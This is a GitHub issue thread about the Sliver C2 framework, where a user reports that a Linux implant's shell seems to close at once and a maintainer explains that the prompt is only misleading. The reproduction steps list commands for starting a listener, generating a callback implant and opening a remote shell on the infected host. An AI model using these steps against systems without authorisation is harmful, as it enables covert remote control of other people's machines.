### ISSUE TITLE
Linux session terminates immediately

### ISSUE THREAD

**Issue by Dauth** [BishopFox/sliver#1619]
**Describe the bug**
The Linux shell terminates immediately after i have typed the "shell"command

**To Reproduce**
1. Start listener 
`https -L 0.0.0.0 -l 443`
2. Generate linux payload
`generate --http 192.168.1.22:443 --save /home/kali/Desktop/test --os linux`
3. Execute the payload
`./MELODIC_IMPROVEMENT`
4. Enter the session
`use c2331885`
5. Attempt to enter shell and observe the shell terminates immediately
`shell`

**Expected behavior**
Upon entering the shell command, it should give you shell access to the system

**Screenshots**
![image](https://github.com/BishopFox/sliver/assets/10680613/fe573ea7-5c26-4bea-a457-978a3f9eef5a)

**Comment by RafBishopFox** [comment]
I played around with this a bit, and I do not think the shell is terminating. It looks like it is because the prompt looks like same as your normal prompt. Check out the following screenshot:
![image](https://github.com/BishopFox/sliver/assets/84349012/91e58e91-4bab-4297-b889-d483258e6b2a)

The shell that opens has the PID you would expect. When we exit the shell and wait a few seconds, we get our Sliver prompt back:
![image](https://github.com/BishopFox/sliver/assets/84349012/b13c8352-4281-400d-b803-8531365db2c7)

If this is not what you are seeing, please reopen the issue and provide more info.
